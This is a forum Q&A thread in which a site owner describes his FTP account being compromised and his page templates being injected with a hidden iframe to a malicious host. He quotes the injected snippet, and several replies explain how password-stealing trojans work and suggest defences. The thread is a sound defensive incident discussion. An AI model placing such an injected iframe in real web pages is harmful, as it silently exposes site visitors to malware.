Answer the question
In order to leave comments, you need to log in
A
A
AlexeyNadezhin2012-07-13 12:51:38
AlexeyNadezhin, 2012-07-13 12:51:38
Viruses on the site. How was FTP hacked?
On July 2, I unexpectedly received the following letter from Yandex in my mail:
Some of the pages on your website may pose a threat to your visitor's computer security. The number of potentially harmful pages is 1.Registered on webmaster.yandex.com, launched a second check. The next day it wrote that everything was fine, but I still decided to compare all the site files with last year's copy. It turned out that 12 files differ.
In the temlates folder, two files had the date 06/29/12. In the header.tpl file, instead of the line
<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">this mess came up:
<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
document.write('<iframe src="httр://yоgоtraff.cu.cc/in.cgi?11" name="Google " scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
img/main_bg.gif) repeat-y center #244e9f;">The same was in the galleryEdit.tpl file and ten more files in the script\jscalendar folder.
If you search on Google, this yogotraff can be found in the code of many Russian sites: www.google.ru/search?ie=UTF-8&hl=ru&q=yogotraff.
Obviously, this is some kind of malicious stuff. Of course, I recovered the files, changed the passwords and wrote a request to the hosting provider, asking how the infection happened. Got a response and logs. At this time, someone from the American address 208.77.96.72 climbed into two of my ftp (and the second is inside the first) and replaced a bunch of files there. As it turned out, my other sites also suffered. The provider offered to scan my computer for viruses. Checked. DrWeb and Kaspersky from boot disks to clear my conscience. There are no viruses. Just little things in FireFox's cache. And how then was my ftp password stolen? It's complicated, you can't pick it up.
What a terrible life.
7 answer(s)
@Ruma7a
@z3apa3a
@Niemand
@charliez
@admin4eg
R
Ruma7a, 2012-07-13 @Ruma7a
“It's complicated, you can't pick it up”
Uh-huh, only it is transmitted in the form of plain text ) Maybe you should think about SSH / SFTP? I apologize in advance if everything is already secure in this regard, it’s just that you mention “just” FTP there.
V
Vladimir Dubrovin, 2012-07-13 @z3apa3a
A fairly standard situation is when a Trojan steals FTP passwords for websites. That is, there are or were viruses. Look for the Trojan on all computers from which the site was accessed via FTP, perhaps they went somewhere else and forgot about it. Change the password for FTP access. After going, set the permissions on the files so that they cannot be overwritten via FTP, every time you need to update the site, change the permissions back.
N
Niemand, 2012-07-13 @Niemand
I know for sure that this is how passwords from old versions of Filezilla, WS_FTP (I don’t know about the new ones) and Total Commander.
C
charliez, 2012-07-13 @charliez
it is enough to visit a site infected according to the same scheme with any browser, and through the adobe flash / sun java vulnerabilities, the virus is activated on the computer and scans the saved passwords in the settings files of popular ftp clients.
A
admin4eg, 2012-07-16 @admin4eg
the standard situation, as they say above, is the computer from which they visited the site at least once.
Trojans have long been able to collect passwords from “headlights”, “total commander” and other popular programs.
change passwords monitor login attempts, restrict incoming ip on ftp
Similar questions
P
A
N
S
J
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question